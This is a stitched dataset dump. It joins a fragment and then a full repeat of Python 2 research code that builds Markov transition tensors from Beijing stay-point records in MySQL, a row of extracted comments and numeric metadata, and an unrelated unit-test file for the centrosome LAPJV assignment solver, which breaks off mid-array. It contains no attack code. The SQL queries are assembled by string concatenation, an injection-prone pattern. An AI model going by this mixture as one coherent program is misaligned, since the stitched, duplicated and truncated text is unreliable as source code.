for item3 in range(dimensionality):
tensor[item][item3] = tensor[item][item3] / count_sum
elif order == 3:
# 三维数组,元素初始化为零
tensor = [[[0 for i in range(dimensionality)] for j in range(dimensionality)] for k in range(dimensionality)]
for index in range(data_length-2):
check_list = data[index:index+3]
tensor[check_list[0]][check_list[1]][check_list[2]] += 1
for item in range(dimensionality):
for item2 in range(dimensionality):
count_sum = 0
for item3 in range(dimensionality):
count_sum += tensor[item][item2][item3]
if 0 == count_sum:
continue
else:
for item4 in range(dimensionality):
tensor[item][item2][item4] = tensor[item][item2][item4] / count_sum
return tensor
# 从线性停留点序列统计用户-时间-频数
def trans2(data_map, poi_dimension, users, time_slice):
user_dimension = len(users)
# 三维数组,元素初始化为零
tensor = [[[0 for poi in range(poi_dimension)] for time in range(0, time_slice)] for user in range(user_dimension)]
print np.array(tensor).shape
for key in data_map.keys():
data = data_map[key]
for slot in range(0, time_slice):
poi_list = data[slot]
for poi in poi_list:
tensor[users.index(key)][slot][poi] += 1
# for item in range(dimensionality):
# for item2 in range(dimensionality):
# count_sum = 0
# for item3 in range(dimensionality):
# count_sum += tensor[item][item2][item3]
# if 0 == count_sum:
# continue
# else:
# for item4 in range(dimensionality):
# tensor[item][item2][item4] = tensor[item][item2][item4] / count_sum
return tensor
def is_contain_zero(vector):
length = len(vector)
while(True):
if vector[length-1] == 0:
length -= 1
else:
break
return vector.any(0), length-1
def matrix_sn_nn(res):
# # print tensor[:-1]
# x = np.array(matrix)
#
# # sum(1) 按行求和
# print "sum: ", x.sum(1)
#
# U, s, Vh = linalg.svd(matrix, full_matrices=True)
# # print type(s)
#
# # print U
# U2 = U[:, :]
# # print U2
#
# V2 = Vh[:, :]
#
# s = s[:]
# S = np.diag(s)
# # print S
#
# # S = linalg.diagsvd(s, 6, 6)
# # print np.allclose(tensor, np.dot(U, np.dot(S, Vh)))
#
# print np.allclose(matrix, np.dot(U2, np.dot(S, V2)))
#
# temp = U2.transpose().sum(1)
# print "temp1: ", temp.shape
# temp = np.array([temp]).transpose()
# print "temp2: ", temp.shape
#
# # print type(temp)
# # print identity(4)
# #
# #
# # print type(eye(4))
# # print eye(4).shape[1]
#
# flag, num = is_contain_zero(temp)
# nr = U2.shape[1]
#
# print "is_contains_zero: ", flag, num
#
# if flag:
# print nr, num, type(np.zeros((nr, num-1))), type(temp)
# print np.zeros((nr, num-1)).shape
# print temp.shape, np.ones((nr, 1)).shape
#
# print np.sum([[0, 1], [0, 5]], axis=1)
#
#
# temp_matrix = np.concatenate((np.zeros((nr, num-1)), temp-np.ones((nr, 1))), 1)
# sigma = identity(nr) + np.concatenate((temp_matrix, np.zeros((nr, nr-num))), 1)
# else:
# sigma = np.diag(temp)
#
# res = U2.dot(sigma)
print "res1: ", res
res = np.array(res)
nc = res.shape[1]
res_min = res.min()
# print np.transpose(S)
if res_min >= -1:
param = 1
else:
param = 1/abs(res_min)
param_matrix = (1/(nc+param))*(np.ones((nc, nc)) + param * eye(nc))
result = res.dot(param_matrix)
print result.sum(1)
return np.array(result)#, sigma, param_matrix
if __name__ == '__main__':
# init_data((0, 3, 4, 5, 30))
#res, sigma, param = matrix_sn_nn([[2**0.5/2, -2**0.5/2], [2**0.5/2, 2**0.5/2]])
#res, sigma, param = matrix_sn_nn([[0.2, 0.8], [0.3, 0.7]])
# print "res2: ", res,res[0][0],res[0][1]
# print "sigma: ", sigma
# print "param: ", param.dot(np.linalg.inv(param))
# res = matrix_sn_nn([[0.1, 0.2, 0.3, 0.4], [0.3, 0.6, 0.05, 0.05]])
res = matrix_sn_nn([[-0.1, 0.2, 0.5, 0.5], [0.3, 0.6, 0.1, 0]])
print "res2:", res | #!/usr/bin/env python
# coding: UTF-8
"""
gowalla_filter:
SELECT user,COUNT(unkown) as loc,COUNT(DISTINCT unkown) as distinct_loc,COUNT(unkown)/COUNT(DISTINCT unkown) as ratio FROM raw a GROUP BY `user` ORDER BY ratio desc;
找出那些比率(所有地点/不同地点)合适的用户
所有地点决定了tensor的稀疏度;不同地点决定了tensor的dimensionality
eg:找到了用户id为147986的所有记录,并将unknow一栏替换为字母(为了方便分析)
"""
from __future__ import division
import MySQLdb
from scipy import linalg
import numpy as np
from numpy.matlib import eye, identity
from preprocess import settings
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2014 <NAME>'
__license__ = 'Public domain'
#连接数据库
def init_data(users, train = 1):
conn = MySQLdb.connect(host = settings.HOST, user = settings.USER, passwd = settings.PASSWORD, db=settings.DB)
cursor = conn.cursor()
result = 0
#得到用户所有位置移动信息,按时间排序
#select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区";
try:
if len(users) == 1:
sql = "select distinct(poi_name) from staypoint where user_id = "+ str(users[0]) +" and province = '北京市' and district = '海淀区' order by id"
else:
sql = "select distinct(poi_name) from staypoint where user_id in "+ users.__str__() +" and province = '北京市' and district = '海淀区' order by id"
print sql
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
#print len(result)
pois_axis = {}
axis_pois = {}
index = 0
for item in result:
pois_axis[item] = index
axis_pois[index] = item
index += 1
datas = {}
predicts = {}
recommends = {}
for user in users:
try:
sql = "select poi_name from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' order by id"
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
data = []
length = int(len(result) * train)
train_data = result[:length]
remain_data = result[length:]
for item in train_data:
data.append(pois_axis[item])
train_set = set(train_data)
predict = []
recommend = []
for item in remain_data:
if item in train_set:
predict.append(pois_axis[item])
else:
recommend.append(pois_axis[item])
datas[user] = data
predicts[user] = predict
recommends[user] = recommend
cursor.close()
conn.close()
# print pois_axis
# print axis_pois
# print datas
return axis_pois, datas, predicts, recommends
# 连接数据库
'''strategy 1: arrival_slot; 2: existance'''
def init_data2(users, train, time_slice):
conn = MySQLdb.connect(host = settings.HOST, user = settings.USER, passwd = settings.PASSWORD, db=settings.DB)
cursor = conn.cursor()
result = 0
#得到用户所有位置移动信息,按时间排序
#select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区";
try:
if len(users) == 1:
sql = "select distinct(poi_name) from staypoint where user_id = "+ str(users[0]) +" and province = '北京市' and district = '海淀区' order by id"
else:
sql = "select distinct(poi_name) from staypoint where user_id in "+ users.__str__() +" and province = '北京市' and district = '海淀区' order by id"
print sql
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
# print len(result)
pois_axis = {}
axis_pois = {}
index = 0
for item in result:
pois_axis[item[0]] = index
axis_pois[index] = item[0]
index += 1
datas = {}
predicts = {}
recommends = {}
# trains = {}
time_slot = range(0, time_slice)
for user in users:
try:
# sql = "select poi_name from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' and arrival_timestamp % 86400 div 3600 = "+str(slot)
sql = "select poi_name, arrival_timestamp from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' order by id"
result = cursor.execute(sql)
result = cursor.fetchall()
conn.commit()
except Exception, e:
print e
conn.rollback()
data = {}
for slot in time_slot:
data[slot] = []
length = int(len(result) * train)
train_data = result[:length]
remain_data = result[length:]
# train_data_list = []
for item in train_data:
# print data.keys()
index = item[1] % 86400 // (3600 * (24 // time_slice))
# print type(index)
# print data.has_key(index)
data[index].append(pois_axis[item[0]])
# train_data_list.append(pois_axis[item[0]])
datas[user] = data
# train_set = set(train_data_list)
# print "trainset: ", train_set
predict = {}
recommend = {}
for slot in time_slot:
recommend[slot] = set()
predict[slot] = set()
for item in remain_data:
axis = pois_axis[item[0]]
index = item[1] % 86400 // (3600 * (24 // time_slice))
if axis in set(data[index]):
predict[index].add(pois_axis[item[0]])
else:
recommend[index].add(pois_axis[item[0]])
predicts[user] = predict
recommends[user] = recommend
# trains[user] = train_set
cursor.close()
conn.close()
# print pois_axis
# print axis_pois
# print datas
return axis_pois, datas, predicts, recommends
# 从线性停留点序列计算马儿可夫转移矩阵或转移张量
def trans(data, dimensionality, order):
# 得到停留点序列长度
data_length = len(data)
if order == 2:
tensor = [[0 for i in range(dimensionality)] for j in range(dimensionality)]
for index in range(data_length-1):
check_list = data[index:index+2]
tensor[check_list[0]][check_list[1]] += 1
for item in range(dimensionality):
count_sum = 0
for item2 in range(dimensionality):
count_sum += tensor[item][item2]
if 0 == count_sum:
continue
else:
for item3 in range(dimensionality):
tensor[item][item3] = tensor[item][item3] / count_sum
elif order == 3:
# 三维数组,元素初始化为零
tensor = [[[0 for i in range(dimensionality)] for j in range(dimensionality)] for k in range(dimensionality)]
for index in range(data_length-2):
check_list = data[index:index+3]
tensor[check_list[0]][check_list[1]][check_list[2]] += 1
for item in range(dimensionality):
for item2 in range(dimensionality):
count_sum = 0
for item3 in range(dimensionality):
count_sum += tensor[item][item2][item3]
if 0 == count_sum:
continue
else:
for item4 in range(dimensionality):
tensor[item][item2][item4] = tensor[item][item2][item4] / count_sum
return tensor
# 从线性停留点序列统计用户-时间-频数
def trans2(data_map, poi_dimension, users, time_slice):
user_dimension = len(users)
# 三维数组,元素初始化为零
tensor = [[[0 for poi in range(poi_dimension)] for time in range(0, time_slice)] for user in range(user_dimension)]
print np.array(tensor).shape
for key in data_map.keys():
data = data_map[key]
for slot in range(0, time_slice):
poi_list = data[slot]
for poi in poi_list:
tensor[users.index(key)][slot][poi] += 1
# for item in range(dimensionality):
# for item2 in range(dimensionality):
# count_sum = 0
# for item3 in range(dimensionality):
# count_sum += tensor[item][item2][item3]
# if 0 == count_sum:
# continue
# else:
# for item4 in range(dimensionality):
# tensor[item][item2][item4] = tensor[item][item2][item4] / count_sum
return tensor
def is_contain_zero(vector):
length = len(vector)
while(True):
if vector[length-1] == 0:
length -= 1
else:
break
return vector.any(0), length-1
def matrix_sn_nn(res):
# # print tensor[:-1]
# x = np.array(matrix)
#
# # sum(1) 按行求和
# print "sum: ", x.sum(1)
#
# U, s, Vh = linalg.svd(matrix, full_matrices=True)
# # print type(s)
#
# # print U
# U2 = U[:, :]
# # print U2
#
# V2 = Vh[:, :]
#
# s = s[:]
# S = np.diag(s)
# # print S
#
# # S = linalg.diagsvd(s, 6, 6)
# # print np.allclose(tensor, np.dot(U, np.dot(S, Vh)))
#
# print np.allclose(matrix, np.dot(U2, np.dot(S, V2)))
#
# temp = U2.transpose().sum(1)
# print "temp1: ", temp.shape
# temp = np.array([temp]).transpose()
# print "temp2: ", temp.shape
#
# # print type(temp)
# # print identity(4)
# #
# #
# # print type(eye(4))
# # print eye(4).shape[1]
#
# flag, num = is_contain_zero(temp)
# nr = U2.shape[1]
#
# print "is_contains_zero: ", flag, num
#
# if flag:
# print nr, num, type(np.zeros((nr, num-1))), type(temp)
# print np.zeros((nr, num-1)).shape
# print temp.shape, np.ones((nr, 1)).shape
#
# print np.sum([[0, 1], [0, 5]], axis=1)
#
#
# temp_matrix = np.concatenate((np.zeros((nr, num-1)), temp-np.ones((nr, 1))), 1)
# sigma = identity(nr) + np.concatenate((temp_matrix, np.zeros((nr, nr-num))), 1)
# else:
# sigma = np.diag(temp)
#
# res = U2.dot(sigma)
print "res1: ", res
res = np.array(res)
nc = res.shape[1]
res_min = res.min()
# print np.transpose(S)
if res_min >= -1:
param = 1
else:
param = 1/abs(res_min)
param_matrix = (1/(nc+param))*(np.ones((nc, nc)) + param * eye(nc))
result = res.dot(param_matrix)
print result.sum(1)
return np.array(result)#, sigma, param_matrix
if __name__ == '__main__':
# init_data((0, 3, 4, 5, 30))
#res, sigma, param = matrix_sn_nn([[2**0.5/2, -2**0.5/2], [2**0.5/2, 2**0.5/2]])
#res, sigma, param = matrix_sn_nn([[0.2, 0.8], [0.3, 0.7]])
# print "res2: ", res,res[0][0],res[0][1]
# print "sigma: ", sigma
# print "param: ", param.dot(np.linalg.inv(param))
# res = matrix_sn_nn([[0.1, 0.2, 0.3, 0.4], [0.3, 0.6, 0.05, 0.05]])
res = matrix_sn_nn([[-0.1, 0.2, 0.5, 0.5], [0.3, 0.6, 0.1, 0]])
print "res2:", res | en | 0.357107 | #!/usr/bin/env python # coding: UTF-8 gowalla_filter: SELECT user,COUNT(unkown) as loc,COUNT(DISTINCT unkown) as distinct_loc,COUNT(unkown)/COUNT(DISTINCT unkown) as ratio FROM raw a GROUP BY `user` ORDER BY ratio desc; 找出那些比率(所有地点/不同地点)合适的用户 所有地点决定了tensor的稀疏度;不同地点决定了tensor的dimensionality eg:找到了用户id为147986的所有记录,并将unknow一栏替换为字母(为了方便分析) #连接数据库 #得到用户所有位置移动信息,按时间排序 #select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区"; #print len(result) # print pois_axis # print axis_pois # print datas # 连接数据库 strategy 1: arrival_slot; 2: existance #得到用户所有位置移动信息,按时间排序 #select distinct poi_name from staypoint where user_id in (0,3,4,5,30) and province = '北京市' and district = "海淀区"; # print len(result) # trains = {} # sql = "select poi_name from staypoint where user_id = "+ str(user) +" and province = '北京市' and district = '海淀区' and arrival_timestamp % 86400 div 3600 = "+str(slot) # train_data_list = [] # print data.keys() # print type(index) # print data.has_key(index) # train_data_list.append(pois_axis[item[0]]) # train_set = set(train_data_list) # print "trainset: ", train_set # trains[user] = train_set # print pois_axis # print axis_pois # print datas # 从线性停留点序列计算马儿可夫转移矩阵或转移张量 # 得到停留点序列长度 # 三维数组,元素初始化为零 # 从线性停留点序列统计用户-时间-频数 # 三维数组,元素初始化为零 # for item in range(dimensionality): # for item2 in range(dimensionality): # count_sum = 0 # for item3 in range(dimensionality): # count_sum += tensor[item][item2][item3] # if 0 == count_sum: # continue # else: # for item4 in range(dimensionality): # tensor[item][item2][item4] = tensor[item][item2][item4] / count_sum # # print tensor[:-1] # x = np.array(matrix) # # # sum(1) 按行求和 # print "sum: ", x.sum(1) # # U, s, Vh = linalg.svd(matrix, full_matrices=True) # # print type(s) # # # print U # U2 = U[:, :] # # print U2 # # V2 = Vh[:, :] # # s = s[:] # S = np.diag(s) # # print S # # # S = linalg.diagsvd(s, 6, 6) # # print np.allclose(tensor, np.dot(U, np.dot(S, Vh))) # # print np.allclose(matrix, np.dot(U2, np.dot(S, V2))) # # temp = U2.transpose().sum(1) # print "temp1: ", temp.shape # temp = np.array([temp]).transpose() # print "temp2: ", temp.shape # # # print type(temp) # # print identity(4) # # # # # # print type(eye(4)) # # print eye(4).shape[1] # # flag, num = is_contain_zero(temp) # nr = U2.shape[1] # # print "is_contains_zero: ", flag, num # # if flag: # print nr, num, type(np.zeros((nr, num-1))), type(temp) # print np.zeros((nr, num-1)).shape # print temp.shape, np.ones((nr, 1)).shape # # print np.sum([[0, 1], [0, 5]], axis=1) # # # temp_matrix = np.concatenate((np.zeros((nr, num-1)), temp-np.ones((nr, 1))), 1) # sigma = identity(nr) + np.concatenate((temp_matrix, np.zeros((nr, nr-num))), 1) # else: # sigma = np.diag(temp) # # res = U2.dot(sigma) # print np.transpose(S) #, sigma, param_matrix # init_data((0, 3, 4, 5, 30)) #res, sigma, param = matrix_sn_nn([[2**0.5/2, -2**0.5/2], [2**0.5/2, 2**0.5/2]]) #res, sigma, param = matrix_sn_nn([[0.2, 0.8], [0.3, 0.7]]) # print "res2: ", res,res[0][0],res[0][1] # print "sigma: ", sigma # print "param: ", param.dot(np.linalg.inv(param)) # res = matrix_sn_nn([[0.1, 0.2, 0.3, 0.4], [0.3, 0.6, 0.05, 0.05]]) | 2.651484 | 3 |
tests/test_lapjv.py | DavidStirling/centrosome | 0 | 6617431 | <reponame>DavidStirling/centrosome<gh_stars>0
from __future__ import absolute_import
import numpy as np
import unittest
import centrosome.lapjv as LAPJV
from centrosome.filter import permutations
from six.moves import range
from six.moves import zip
class TestLAPJVPYX(unittest.TestCase):
def test_01_01_reduction_transfer(self):
"""Test the reduction transfer implementation"""
cases = [
dict(
i=[0, 1, 2],
j=[0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6],
count=[3, 3, 3],
x=[2, 0, 1],
y=[1, 2, 0],
c=[5.0, 4.0, 1.0, 2.0, 6.0, 4.0, 4.0, 3.0, 7.0],
u_in=[0.0, 0.0, 0.0],
v_in=[1.0, 2.0, 3.0],
u_out=[2.0, 3.0, 6.0],
v_out=[-2.0, -4.0, 1.0],
),
dict(
i=[1, 2, 3],
j=[0, 1, 2, 0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6, 9],
count=[3, 3, 3, 3],
x=[3, 2, 0, 1],
y=[1, 2, 0, 3],
c=[0.0, 0.0, 0.0, 5.0, 4.0, 1.0, 2.0, 6.0, 4.0, 4.0, 3.0, 7.0],
u_in=[0.0, 0.0, 0.0, 0.0],
v_in=[1.0, 2.0, 3.0, 0.0],
u_out=[0.0, 2.0, 3.0, 6.0],
v_out=[-2.0, -4.0, 1.0, 0.0],
),
]
for case in cases:
u = np.ascontiguousarray(case["u_in"], np.float64)
v = np.ascontiguousarray(case["v_in"], np.float64)
LAPJV.reduction_transfer(
np.ascontiguousarray(case["i"], np.uint32),
np.ascontiguousarray(case["j"], np.uint32),
np.ascontiguousarray(case["idx"], np.uint32),
np.ascontiguousarray(case["count"], np.uint32),
np.ascontiguousarray(case["x"], np.uint32),
u,
v,
np.ascontiguousarray(case["c"], np.float64),
)
expected_u = np.array(case["u_out"])
expected_v = np.array(case["v_out"])
np.testing.assert_array_almost_equal(expected_u, u)
np.testing.assert_array_almost_equal(expected_v, v)
def test_02_01_augmenting_row_reduction(self):
cases = [
dict(
n=3,
ii=[1],
jj=[0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6],
count=[3, 3, 3],
x=[1, 3, 0],
y=[2, 0, 3],
u_in=[1.0, 2.0, 3.0],
v_in=[1.0, 2.0, 3.0],
c=[3.0, 6.0, 5.0, 5.0, 5.0, 7.1, 8.0, 11.0, 9.0],
u_out=[1.0, 2.0, 3.0],
v_out=[1.0, 1.0, 3.0],
x_out=[2, 1, 0],
y_out=[2, 1, 0],
)
]
for case in cases:
u = np.ascontiguousarray(case["u_in"], np.float64)
v = np.ascontiguousarray(case["v_in"], np.float64)
x = np.ascontiguousarray(case["x"], np.uint32)
y = np.ascontiguousarray(case["y"], np.uint32)
LAPJV.augmenting_row_reduction(
case["n"],
np.ascontiguousarray(case["ii"], np.uint32),
np.ascontiguousarray(case["jj"], np.uint32),
np.ascontiguousarray(case["idx"], np.uint32),
np.ascontiguousarray(case["count"], np.uint32),
x,
y,
u,
v,
np.ascontiguousarray(case["c"], np.float64),
)
expected_u = np.array(case["u_out"])
expected_v = np.array(case["v_out"])
expected_x = np.array(case["x_out"])
expected_y = np.array(case["y_out"])
np.testing.assert_array_almost_equal(expected_u, u)
np.testing.assert_array_almost_equal(expected_v, v)
np.testing.assert_array_equal(expected_x, x)
np.testing.assert_array_equal(expected_y, y)
def test_03_01_augment(self):
cases = [
dict(
n=3,
i=[2],
j=[0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6],
count=[3, 3, 3],
x_in=[0, 1, 3],
x_out=[0, 1, 2],
y_in=[0, 1, 3],
y_out=[0, 1, 2],
u_in=[4, 0, 2],
v_in=[-1, 1, 1],
u_out=[4, 0, 2],
v_out=[-1, 1, 1],
c=[3, 5, 7, 4, 1, 6, 2, 3, 3],
)
]
for case in cases:
n = case["n"]
i = np.ascontiguousarray(case["i"], np.uint32)
j = np.ascontiguousarray(case["j"], np.uint32)
idx = np.ascontiguousarray(case["idx"], np.uint32)
count = np.ascontiguousarray(case["count"], np.uint32)
x = np.ascontiguousarray(case["x_in"], np.uint32)
y = np.ascontiguousarray(case["y_in"], np.uint32)
u = np.ascontiguousarray(case["u_in"], np.float64)
v = np.ascontiguousarray(case["v_in"], np.float64)
c = np.ascontiguousarray(case["c"], np.float64)
LAPJV.augment(n, i, j, idx, count, x, y, u, v, c)
np.testing.assert_array_equal(x, case["x_out"])
np.testing.assert_array_equal(y, case["y_out"])
np.testing.assert_almost_equal(u, case["u_out"])
np.testing.assert_almost_equal(v, case["v_out"])
class TestLAPJV(unittest.TestCase):
def test_01_02(self):
r = np.random.RandomState()
r.seed(11)
for reductions in [0, 2]:
for _ in range(100):
c = r.randint(1, 10, (5, 5))
i, j = np.mgrid[0:5, 0:5]
i = i.flatten()
j = j.flatten()
x, y, u, v = LAPJV.lapjv(i, j, c.flatten(), True, reductions)
min_cost = np.sum(c)
best = None
for permutation in permutations([0, 1, 2, 3, 4]):
cost = sum([c[i, permutation[i]] for i in range(5)])
if cost < min_cost:
best = list(permutation)
min_cost = cost
result_cost = sum([c[i, x[i]] for i in range(5)])
self.assertAlmostEqual(min_cost, result_cost)
def test_01_03(self):
"""Regression tests of matrices that crashed lapjv"""
dd = [
np.array(
[
[0.0, 0.0, 0.0],
[1.0, 1.0, 5.34621029],
[1.0, 7.0, 55.0],
[2.0, 2.0, 2.09806089],
[2.0, 8.0, 55.0],
[3.0, 3.0, 4.82063029],
[3.0, 9.0, 55.0],
[4.0, 4.0, 3.99481917],
[4.0, 10.0, 55.0],
[5.0, 5.0, 3.18959054],
[5.0, 11.0, 55.0],
[6.0, 1.0, 55.0],
[6.0, 7.0, 0.0],
[6.0, 8.0, 0.0],
[6.0, 9.0, 0.0],
[6.0, 10.0, 0.0],
[6.0, 11.0, 0.0],
[7.0, 2.0, 55.0],
[7.0, 7.0, 0.0],
[7.0, 8.0, 0.0],
[7.0, 9.0, 0.0],
[7.0, 10.0, 0.0],
[7.0, 11.0, 0.0],
[8.0, 3.0, 55.0],
[8.0, 7.0, 0.0],
[8.0, 8.0, 0.0],
[8.0, 9.0, 0.0],
[8.0, 10.0, 0.0],
[8.0, 11.0, 0.0],
[9.0, 4.0, 55.0],
[9.0, 7.0, 0.0],
[9.0, 8.0, 0.0],
[9.0, 9.0, 0.0],
[9.0, 10.0, 0.0],
[9.0, 11.0, 0.0],
[10.0, 5.0, 55.0],
[10.0, 7.0, 0.0],
[10.0, 8.0, 0.0],
[10.0, 9.0, 0.0],
[10.0, 10.0, 0.0],
[10.0, 11.0, 0.0],
[11.0, 6.0, 55.0],
[11.0, 7.0, 0.0],
[11.0, 8.0, 0.0],
[11.0, 9.0, 0.0],
[11.0, 10.0, 0.0],
[11.0, 11.0, 0.0],
]
),
np.array(
[
[0.0, 0.0, 0.0],
[1.0, 1.0, 1.12227977],
[1.0, 6.0, 55.0],
[2.0, 2.0, 18.66735253],
[2.0, 4.0, 16.2875504],
[2.0, 7.0, 55.0],
[3.0, 5.0, 1.29944194],
[3.0, 8.0, 55.0],
[4.0, 5.0, 32.61892281],
[4.0, 9.0, 55.0],
[5.0, 1.0, 55.0],
[5.0, 6.0, 0.0],
[5.0, 7.0, 0.0],
[5.0, 8.0, 0.0],
[5.0, 9.0, 0.0],
[6.0, 2.0, 55.0],
[6.0, 6.0, 0.0],
[6.0, 7.0, 0.0],
[6.0, 8.0, 0.0],
[6.0, 9.0, 0.0],
[7.0, 3.0, 55.0],
[7.0, 6.0, 0.0],
[7.0, 7.0, 0.0],
[7.0, 8.0, 0.0],
[7.0, 9.0, 0.0],
[8.0, 4.0, 55.0],
[8.0, 6.0, 0.0],
[8.0, 7.0, 0.0],
[8.0, 8.0, 0.0],
[8.0, 9.0, 0.0],
[9.0, 5.0, 55.0],
[9.0, 6.0, 0.0],
[9.0, 7.0, 0.0],
[9.0, 8.0, 0.0],
[9.0, 9.0, 0.0],
]
),
]
expected_costs = [74.5, 1000000]
for d, ec in zip(dd, expected_costs):
n = np.max(d[:, 0].astype(int)) + 1
x, y = LAPJV.lapjv(d[:, 0].astype(int), d[:, 1].astype(int), d[:, 2])
c = np.ones((n, n)) * 1000000
c[d[:, 0].astype(int), d[:, 1].astype(int)] = d[:, 2]
self.assertTrue(np.sum(c[np.arange(n), x]) < ec)
self.assertTrue(np.sum(c[y, np.arange(n)]) < ec)
| from __future__ import absolute_import
import numpy as np
import unittest
import centrosome.lapjv as LAPJV
from centrosome.filter import permutations
from six.moves import range
from six.moves import zip
class TestLAPJVPYX(unittest.TestCase):
def test_01_01_reduction_transfer(self):
"""Test the reduction transfer implementation"""
cases = [
dict(
i=[0, 1, 2],
j=[0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6],
count=[3, 3, 3],
x=[2, 0, 1],
y=[1, 2, 0],
c=[5.0, 4.0, 1.0, 2.0, 6.0, 4.0, 4.0, 3.0, 7.0],
u_in=[0.0, 0.0, 0.0],
v_in=[1.0, 2.0, 3.0],
u_out=[2.0, 3.0, 6.0],
v_out=[-2.0, -4.0, 1.0],
),
dict(
i=[1, 2, 3],
j=[0, 1, 2, 0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6, 9],
count=[3, 3, 3, 3],
x=[3, 2, 0, 1],
y=[1, 2, 0, 3],
c=[0.0, 0.0, 0.0, 5.0, 4.0, 1.0, 2.0, 6.0, 4.0, 4.0, 3.0, 7.0],
u_in=[0.0, 0.0, 0.0, 0.0],
v_in=[1.0, 2.0, 3.0, 0.0],
u_out=[0.0, 2.0, 3.0, 6.0],
v_out=[-2.0, -4.0, 1.0, 0.0],
),
]
for case in cases:
u = np.ascontiguousarray(case["u_in"], np.float64)
v = np.ascontiguousarray(case["v_in"], np.float64)
LAPJV.reduction_transfer(
np.ascontiguousarray(case["i"], np.uint32),
np.ascontiguousarray(case["j"], np.uint32),
np.ascontiguousarray(case["idx"], np.uint32),
np.ascontiguousarray(case["count"], np.uint32),
np.ascontiguousarray(case["x"], np.uint32),
u,
v,
np.ascontiguousarray(case["c"], np.float64),
)
expected_u = np.array(case["u_out"])
expected_v = np.array(case["v_out"])
np.testing.assert_array_almost_equal(expected_u, u)
np.testing.assert_array_almost_equal(expected_v, v)
def test_02_01_augmenting_row_reduction(self):
cases = [
dict(
n=3,
ii=[1],
jj=[0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6],
count=[3, 3, 3],
x=[1, 3, 0],
y=[2, 0, 3],
u_in=[1.0, 2.0, 3.0],
v_in=[1.0, 2.0, 3.0],
c=[3.0, 6.0, 5.0, 5.0, 5.0, 7.1, 8.0, 11.0, 9.0],
u_out=[1.0, 2.0, 3.0],
v_out=[1.0, 1.0, 3.0],
x_out=[2, 1, 0],
y_out=[2, 1, 0],
)
]
for case in cases:
u = np.ascontiguousarray(case["u_in"], np.float64)
v = np.ascontiguousarray(case["v_in"], np.float64)
x = np.ascontiguousarray(case["x"], np.uint32)
y = np.ascontiguousarray(case["y"], np.uint32)
LAPJV.augmenting_row_reduction(
case["n"],
np.ascontiguousarray(case["ii"], np.uint32),
np.ascontiguousarray(case["jj"], np.uint32),
np.ascontiguousarray(case["idx"], np.uint32),
np.ascontiguousarray(case["count"], np.uint32),
x,
y,
u,
v,
np.ascontiguousarray(case["c"], np.float64),
)
expected_u = np.array(case["u_out"])
expected_v = np.array(case["v_out"])
expected_x = np.array(case["x_out"])
expected_y = np.array(case["y_out"])
np.testing.assert_array_almost_equal(expected_u, u)
np.testing.assert_array_almost_equal(expected_v, v)
np.testing.assert_array_equal(expected_x, x)
np.testing.assert_array_equal(expected_y, y)
def test_03_01_augment(self):
cases = [
dict(
n=3,
i=[2],
j=[0, 1, 2, 0, 1, 2, 0, 1, 2],
idx=[0, 3, 6],
count=[3, 3, 3],
x_in=[0, 1, 3],
x_out=[0, 1, 2],
y_in=[0, 1, 3],
y_out=[0, 1, 2],
u_in=[4, 0, 2],
v_in=[-1, 1, 1],
u_out=[4, 0, 2],
v_out=[-1, 1, 1],
c=[3, 5, 7, 4, 1, 6, 2, 3, 3],
)
]
for case in cases:
n = case["n"]
i = np.ascontiguousarray(case["i"], np.uint32)
j = np.ascontiguousarray(case["j"], np.uint32)
idx = np.ascontiguousarray(case["idx"], np.uint32)
count = np.ascontiguousarray(case["count"], np.uint32)
x = np.ascontiguousarray(case["x_in"], np.uint32)
y = np.ascontiguousarray(case["y_in"], np.uint32)
u = np.ascontiguousarray(case["u_in"], np.float64)
v = np.ascontiguousarray(case["v_in"], np.float64)
c = np.ascontiguousarray(case["c"], np.float64)
LAPJV.augment(n, i, j, idx, count, x, y, u, v, c)
np.testing.assert_array_equal(x, case["x_out"])
np.testing.assert_array_equal(y, case["y_out"])
np.testing.assert_almost_equal(u, case["u_out"])
np.testing.assert_almost_equal(v, case["v_out"])
class TestLAPJV(unittest.TestCase):
def test_01_02(self):
r = np.random.RandomState()
r.seed(11)
for reductions in [0, 2]:
for _ in range(100):
c = r.randint(1, 10, (5, 5))
i, j = np.mgrid[0:5, 0:5]
i = i.flatten()
j = j.flatten()
x, y, u, v = LAPJV.lapjv(i, j, c.flatten(), True, reductions)
min_cost = np.sum(c)
best = None
for permutation in permutations([0, 1, 2, 3, 4]):
cost = sum([c[i, permutation[i]] for i in range(5)])
if cost < min_cost:
best = list(permutation)
min_cost = cost
result_cost = sum([c[i, x[i]] for i in range(5)])
self.assertAlmostEqual(min_cost, result_cost)
def test_01_03(self):
"""Regression tests of matrices that crashed lapjv"""
dd = [
np.array(
[
[0.0, 0.0, 0.0],
[1.0, 1.0, 5.34621029],
[1.0, 7.0, 55.0],
[2.0, 2.0, 2.09806089],
[2.0, 8.0, 55.0],
[3.0, 3.0, 4.82063029],
[3.0, 9.0, 55.0],
[4.0, 4.0, 3.99481917],
[4.0, 10.0, 55.0],
[5.0, 5.0, 3.18959054],
[5.0, 11.0, 55.0],
[6.0, 1.0, 55.0],
[6.0, 7.0, 0.0],
[6.0, 8.0, 0.0],
[6.0, 9.0, 0.0],
[6.0, 10.0, 0.0],
[6.0, 11.0, 0.0],
[7.0, 2.0, 55.0],
